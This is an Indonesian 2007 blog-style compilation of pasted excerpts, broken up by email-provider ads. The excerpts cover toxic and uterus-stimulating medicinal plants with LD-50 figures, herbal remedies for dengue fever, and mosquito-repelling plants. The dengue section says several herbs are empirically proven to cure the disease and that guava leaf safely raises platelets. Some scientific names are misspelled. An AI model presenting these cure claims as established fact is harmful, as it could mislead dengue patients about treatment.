Vinca rosea (daun tapak dara) Page 9

Demikian juga dari suatu hasil percobaan toksisitas dan
kandungan senyawa kimia
yang berbahaya yang pernah dipublikasikan pada suatu
artikel, antara lain menyebutkan
sebagai berikut :
a. Beberapa tanaman yg telah diketahui mengandung bahan
yang berbahaya
1. Dari suku Euphorbiaceae :
Phylanthus sp. : mengandung ester phorbol yang dinyata-kan
dapat merangsang
virus Epstein-Borr (dalam waktu lama menyebabkan
karsinoma)
Recinus comunis : bijinya mengandung protein risin, yang
apabila diabsorpsi dalam
bentuk asli, akan meng-hambat sintesis protein, karena
dapat
mengacaukan proses metabolisme)
Croton tiglium L. : bijinya mengandung crotin (suatu
protein fitotoksin),
fraksi resinnya menyebabkan radang kulit
minyak croton mengandung suatu zat karsinogenik yang dapat
merangsang karsinogen lemah, sehingga memacu terjadinya
kanker
2. Dari suku Rutaceae :
Ruta graveolens L. : mengandung glukosida kumarin
(rutarin/marmesin)
- mengiritasi kulit (bagi yang peka) menyebabkan
lepuh-lepuh dan demam
- jika infusa terminum kemungkinan bisa menimbulkan
peradangan usus
a. Tanaman yang dianggap berbahaya (LD 50 : kecil, tetapi
belum diketahui
kandungan mana yang mengakibatkan gejala negatif
NO BAHAN BAKU DAN
TANAMAN ASAL
FAMILIA
LD-50
1.
Majakan (proses reaksi daun
Quercus lusitanica Roxb.)
Fagaceae
16,45 mg/kg. BB
2.
Nagasari
(bunga Mesua ferae L.)
Guttiferae
20,93 mg/kg. BB
3.
Sukmadiluwih (buah Gunera
macrophyla Bl.)
Halorrhagidace
ae
21,91 mg/Kg.BB
4.
Sidowayah (bunga Woodfor-dia
floribunda)
Litraceae
24,22 mg/kg.BB
5.
Kulit buah delima (Punica
granatum L.)
28,0 mg/kg.BB
b. Tanaman yang bersifat oksitosik ( merangsang uterus),
tetapi belum diketahui
zat penyebabnya
1. Jungrahap (daun Beachea frutescen L. familia Myrtaceae)
2. Majakan (eksudat daun Quercus lusitanica Lamk. Familia
Fagaceae)
3. daun kaki kuda (Centela asiatica Urb.familia
Umbeliferaeae)
4. Meniran (Phyllathus niruri L.familia Euphorbiaceae)
5. umbi Angelica sinensis L. ramuan yang menyebabkan cacat
Kelima bahan tersebut disusun berdasarkan urutan paling
kuat sifat
oksitosiknya. Walaupun baru merupakan informasi percobaan
pada hewan, tetapi telah
memberikan petunjuk paling tidak bahwa Jungrahap yang
digunakan bersamaan dengan
daun sembung dan beluntas serta daun kaki kuda,
mengakibatkan kematian pada induk Page 10

hewan percobaan, pendarahan pada uterus dan usus, kematian
janin, pertumbuhan janin
tidak normal (lambat); meskipun dosis yang diberikan baru
10 kali lebih kecil dari dosis
lazim pada manusia. Memang tidak begitu jelas adanya
adisi, potensiasi atau inhibisi
antara bahan-bahan diatas bila diberikan bersama.
Tetapi setidak-tidaknya dari informasi tersebut kita perlu
mewaspadai terutama
bila digunakan untuk sesuatu yang berkaitan dengan sistem
reproduksi seperti terlambat
bulan/haid, jamu hamil, keputihan, sari rapet dan
semacamnya.


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Tanaman Obat DBD

Sedangkan untuk pengobatan penderita DBD, ada beberapa
tanaman yang telah terbukti
secara empiris dapat mengobati penyakit DBD antara lain:
kunyit (Curcuma domestica
L.), temu ireng (Curcuma aeruginosa L.), meniran
(Phyllanthus nirun L.), pepaya
(Carica papaya L.) dan jambu biji (Psidium guajava L.).
Bahkan daun jambu biji telah teruji secara klinis dapat
meningkatkan trombosit. Hasil
penelitian menunjukkan bahwa pemberian ekstrak kering daun
jambu biji setiap 4-6 jam
meningkatkan jumlah trombosit >100.000/µl setelah 12-14
jam, tanpa efek samping
yang berarti. Namun demikian untuk mengobati suatu
penyakit biasanya tanaman obat
tidak bekerja sendiri-sendiri harus dicampurkan menjadi
suatu ramuan obat.


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Tanaman Pengusir Nyamuk

Tanaman Pengusir Nyamuk
Pencegahan bisa dilakukan dengan mengusir nyamuk di
lingkungan tinggal dengan
menggunakan tanaman pengusir nyamuk penyebab DBD. Tanaman
tersebut dapat
disimpan di dalam atau ditanam di halaman rumah.Page 2

Nyamuk penular (vektor) penyakit demam berdarah memang
sulit untuk ditanggulangi.
Tetapi ada satu cara yang efektif dan murah untuk
menghindarinya, yakni dengan
mengusir nyamuk dari lingkungan sekitar kita atau mencegah
agar nyamuk tidak sampai
menggigit dengan menggunakan tanaman obat.
Beberapa tanaman yang dapat digunakan untuk pengusir
nyamuk antara lain: Zodia
(Evodia suaveolens), sera wangi (Cymbopogon nardus),
Lavender (Lavandula latifolia),
Geranium (Geranium homeanum), nilam (Pogostemon cablin)
dan mimba (Azadirachta
indica). &#8221;Semua tanaman obat tersebut ada di
Balittro&#8221;, tambah Moch Syakir.
Dijelaskan, Zodia, serai wangi, geranium dan lavender
dapat langsung digunakan untuk
mengusir nyamuk dengan cara menanam di pot kemudian
disimpan di dalam rumah
atau ditanam di halaman rumah. Tanaman pengusir nyamuk ini
juga bisa dibuat lotion
yang dioleskan ke tubuh sehingga nyamuk enggan untuk
menggigit. Kelebihan lotion
ini adalah tidak memberikan efek negatif pada kulit.


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Wednesday, August 8, 2007